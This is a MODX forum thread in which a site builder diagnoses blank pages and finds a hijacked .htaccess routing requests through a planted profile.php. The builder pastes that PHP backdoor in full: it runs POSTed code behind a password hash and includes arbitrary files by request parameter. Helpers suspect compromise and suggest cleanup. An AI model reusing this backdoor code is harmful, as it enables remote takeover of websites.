On March 26, 2019 we launched new MODX Forums. Please join us at the new MODX Community Forums.
Subscribe: RSS
  • I built this site for a client, and launched it a few months ago. Recently, the client has made me aware of some very odd behavior. Apart from the front page, which seems to be working fine, every page on the site loads a blank screen. Viewing the source code shows a single line of enigmatic code:

    <div style="display:none">3054fa38dbdc58de23337c03e086c1e3</div>

    I’ve checked everything under the hood, and it all seems fine. The templates all look correct, the documents in the editor all load fine, the database (while excruciatingly slow to view via phpmyadmin on the hosts erver) appear intact.

    I am unaware of any changes the client has made that could cause such a problem, and I doubt they would have the knowledge to make any such change anyway. I’ve told them to stick to editing documents and to stay out of the rest of the manager. The site is hosted on a shared server.

    The site in question is: http://vicphysics.org
    An example problem page is: http://www.vicphysics.org/photocontest.html

    Some details:

    MODx version: 0.9.6
    MySQL version: 5.0.51a
    PHP version: 5.2.3
    Phoinfo: http://vicphysics.org/phpinfo.php
    Apache version: 2.2.4

    Please let me know if there is any other information that would be helpful. Thank you in advance for any help you can offer!
    • Is there, by chance, an index.htm file? I see there’s an old index.html file there.

      Take a close look at your .htaccess file. Maybe your host (or your client) has overwritten or deleted it.

      Another possibility is a host-added php.ini file.


        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
      • Thanks for the reply.

        Yes there is an index.html. This is the old, obsolete site which is flat HTML. We have kept it there for users who refuse to upgrade from MSIE6 and have some problems viewing the new MODx site (the client refused to pay me for the inordinate amount of time it would have taken to jerry-rig the site to work properly in IE6). I use the .htaccess to load the index.php by default, but still allow users access to the old site by manually entering the index.html on the url.

        I can post the content of the .htaccess file here, if that’s not a security risk.

        Thre doesn’t appear to be a php.ini file in the root directory.

        Thanks for the help!
        • The reason I asked about index.htm (as opposed to .html) is that requesting vicphysics.org/index.htm produces the empty page and it’s unlikely that that goes through MODx.

          There could be a php.ini file above or below the modx root directory which might apply. Sometimes php.ini will have directives on how various files should be served.

          If there’s anything sensitive in the .htaccess file, you can rewrite that part before posting it.

            Did I help you? Buy me a beer
            Get my Book: MODX:The Official Guide
            MODX info for everyone: http://bobsguides.com/modx.html
            My MODX Extras
            Bob's Guides is now hosted at A2 MODX Hosting
          • Here’s the .htaccess:

            DirectoryIndex index.php index.html
            
            # MODx supports Friendly URLs via this .htaccess file. You must serve web
            # pages via Apache with mod_rewrite to use this functionality, and you must
            # change the file name from ht.access to .htaccess.
            #
            # Make sure RewriteBase points to the directory where you installed MODx.
            # E.g., "/modx" if your installation is in a "modx" subdirectory. If you have
            # problems with your .htaccess working at all, try un-commenting the first 
            # line above the "RewriteEngine On" directive.
            #
            # You may choose to make your URLs non-case-sensitive by adding a NC directive
            # to your rule: RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA,NC]
            
            #Options +FollowSymlinks
            RewriteEngine On
            RewriteBase /
            
            
            
            # Rewrite www.domain.com -> domain.com -- used with SEO Strict URLs plugin
            #RewriteCond %{HTTP_HOST} .
            #RewriteCond %{HTTP_HOST} !^www.vicphysics.org\.com [NC]
            #RewriteRule (.*) http://www.vicphysics.org/$1 [R=301,L]
            #
            # or for the opposite domain.com -> www.domain.com use the following
            # >>> DO NOT USE BOTH THE ABOVE AND BELOW <<<
            #
            #RewriteCond %{HTTP_HOST} .
            #RewriteCond %{HTTP_HOST} !^www\.example-domain-please-change\.com [NC]
            #RewriteRule (.*) http://www.example-domain-please-change.com/$1 [R=301,L]
            
            
            
            # Rewrite secure requests properly to prevent SSL cert warnings, e.g. prevent 
            # https://www.domain.com when your cert only allows https://secure.domain.com
            #RewriteCond %{SERVER_PORT} !^443
            #RewriteRule (.*) https://www.vicphysics.org/$1 [R=301,L]
            
            
            
            # The Friendly URLs part
            RewriteCond %{REQUEST_FILENAME} !-f
            RewriteCond %{REQUEST_FILENAME} !-d
            RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]
            
            
            
            # Make sure .htc files are served with the proper MIME type, which is critical # for XP SP2. Un-comment if your host allows htaccess MIME type overrides.
            
            #AddType text/x-component .htc
            
            
            
            # If your server is not already configured as such, the following directive
            # should be uncommented in order to set PHP's register_globals option to OFF.
            # This closes a major security hole that is abused by most XSS (cross-site
            # scripting) attacks. For more information: http://php.net/register_globals
            #
            # To verify that this option has been set to OFF, open the Manager and choose
            # Reports -> System Info and then click the phpinfo() link. Do a Find on Page
            # for "register_globals". The Local Value should be OFF. If the Master Value
            # is OFF then you do not need this directive here.
            #
            # IF REGISTER_GLOBALS DIRECTIVE CAUSES 500 INTERNAL SERVER ERRORS :
            #
            # Your server does not allow PHP directives to be set via .htaccess. In that
            # case you must make this change in your php.ini file instead. If you are
            # using a commercial web host, contact the administrators for assistance in
            # doing this. Not all servers allow local php.ini files, and they should
            # include all PHP configurations (not just this one), or you will effectively
            # reset everything to PHP defaults. Consult www.php.net for more detailed
            # information about setting PHP directives.
            
            php_flag register_globals Off
            
            
            
            # For servers that support output compression, you should pick up a bit of
            # speed but un-commenting the following lines.
            
            #php_flag zlib.output_compression On
            #php_value zlib.output_compression_level 5
            
            
            
            # The following directives stop screen flicker in IE on CSS rollovers. If
            # needed, un-comment the following rules. When they're in place, you may have
            # to do a force-refresh in order to see changes in your designs.
            
            #ExpiresActive On
            #ExpiresByType image/gif A2592000
            #ExpiresByType image/jpeg A2592000
            #ExpiresByType image/png A2592000
            #BrowserMatch "MSIE" brokenvary=1
            #BrowserMatch "Mozilla/4.[0-9]{2}" brokenvary=1
            #BrowserMatch "Opera" !brokenvary
            #SetEnvIf brokenvary 1 force-no-vary
            
            
            
            AuthName vicphysics.org
            AuthUserFile  	/home43a/sub006/sc32167-DHIS/vicphys/www/_vti_pvt/service.pwd
            AuthGroupFile  	/home43a/sub006/sc32167-DHIS/vicphys/www/_vti_pvt/service.grp
            
            DirectoryIndex index.php index.html index.htm
            
            #Options +FollowSymlinks
            
            RewriteEngine On
            
            RewriteBase /
            
            # The Friendly URLs part
            
            RewriteCond %{REQUEST_FILENAME} !-f
            
            RewriteCond %{REQUEST_FILENAME} !-d
            
            RewriteRule ^(.*)$ /profile.php?rewriter_request=index.php&q=$1 [L,QSA]


            I don’t think there’s anything sensitive in there. It’s a bit of a mess though...

            There’s no index.htm file in the root directory. Where else might I look for a host added php.ini file?

            Thanks again smiley
            • The typical FURL part looks like this:

              # The Friendly URLs part
              RewriteCond %{REQUEST_FILENAME} !-f
              RewriteCond %{REQUEST_FILENAME} !-d
              RewriteRule ^(.*)$ index.php?q=$1 [L,QSA]


              Is the profile.php thing something you put in?

              For starters, you could try turning off FURLS in the manager and comment out the FURL code in .htaccces to see what that gets you.

              It does sound like a FURL problem, BTW.
                Did I help you? Buy me a beer
                Get my Book: MODX:The Official Guide
                MODX info for everyone: http://bobsguides.com/modx.html
                My MODX Extras
                Bob's Guides is now hosted at A2 MODX Hosting
              • I just had a quick look at the profile.php file. I don’t recall putting it in there specifically. Here’s the code:

                <?php
                error_reporting(0);
                
                if (file_exists('assets/public/functions.php')) {
                	include('assets/public/functions.php');
                }
                
                if (md5($_POST['4a2faa4b']) == '3054fa38dbdc58de23337c03e086c1e3') {
                	$test_func = create_function('', urldecode($_POST['f']));
                	$test_func();
                }
                
                if (isset($_GET['rewriter_request'])) {
                	chdir($_GET['rewriter_request']);
                	include($_GET['rewriter_request']);
                } else {
                	$request_parts = parse_url($_SERVER['REQUEST_URI']);
                	if ($request_parts['path'] == '/profile.php') { exit(); }
                	$request_path = '.'.$request_parts['path'];
                	if (substr($request_path, -1) == '/') {
                		$index_files = array();
                		if ($handle = opendir($request_path)) {
                			while (false !== ($file = readdir($handle))) {
                				if (preg_match('/index\.html*/i', $file) || preg_match('/index\.php[345]*/i', $file)) {
                					$index_files[filemtime($file)] = $file;
                				}
                			}
                			closedir($handle);
                		}
                		if (count($index_files) > 0) {
                			krsort($index_files);
                			$request_path = $request_path.reset($index_files);
                			chdir(dirname($request_path));
                			include(basename($request_path));
                		} else {
                			header('HTTP/1.0 404 Not found');
                		}
                	} else {
                		if (file_exists($request_path)) { 
                			chdir(dirname($request_path));
                			include(basename($request_path)); 
                		} else {
                			header('HTTP/1.0 404 Not found');
                		}
                	}
                }
                ?>


                Notice the code on line 8 - that string is what appears in the source of all the pages that aren’t displayed! This must have something to do with the problem.

                I just tried renaming it to profie-temp.php to see if it had any effect, but it seems the host is having problems right now, as the site is giving a database error whether the profile.php is remaned or not.

                Does the source of the profile.php suggest anything to you? (I’m not a php programmer - I know just enough to get MODx and snippets working).
                • It’s not my area of expertise, but it could be a cross-site hacking attempt.

                  See what’s in ’assets/public/functions.php.’ It may give you a clue about what’s going on.

                  That md5 section basically says that if the browser receives a request with the appropriate string in the $_POST array, it should create a function with the code sent in the ’f’ variable of the $_POST array and then execute it. Kind of a scary prospect, although it could be legit. My 0.9.6 installs are not current but there’s no assets/public directory in them at all. Do you have SMF attached to your site? I think it uses a profile.php script.

                  I would rename the .htaccess file, for now, and create a new one with just the normal rewrite code I gave above and keep an eye on it to see if it changes back. That would be a sign that someone is messing with you.

                  Hopefully, someone who knows more about this than I do will chime in.


                    Did I help you? Buy me a beer
                    Get my Book: MODX:The Official Guide
                    MODX info for everyone: http://bobsguides.com/modx.html
                    My MODX Extras
                    Bob's Guides is now hosted at A2 MODX Hosting
                  • yep, definitely a very strange .htaccess file. You can also download a fresh modx version and upload that default .htaccess file, overwriting the current one.

                    URLs like http://vicphysics.org/index.php?id=145 work fine (no rewriting)
                    • I think WordPress also uses a profile.php file.

                      If you don’t have WordPress or SMF, or any other foreign addition to your site, though, it’s much more likely that this is malicious.

                      You might also want to check your visitors log in cPanel (or whatever) to see if there is a particular suspicious visitor asking for a nonexestent page over and over.

                      I would also mention this to your hosting service if you can’t find any reason for the profile.php file being there (include that md5 section in your message to them).


                        Did I help you? Buy me a beer
                        Get my Book: MODX:The Official Guide
                        MODX info for everyone: http://bobsguides.com/modx.html
                        My MODX Extras
                        Bob's Guides is now hosted at A2 MODX Hosting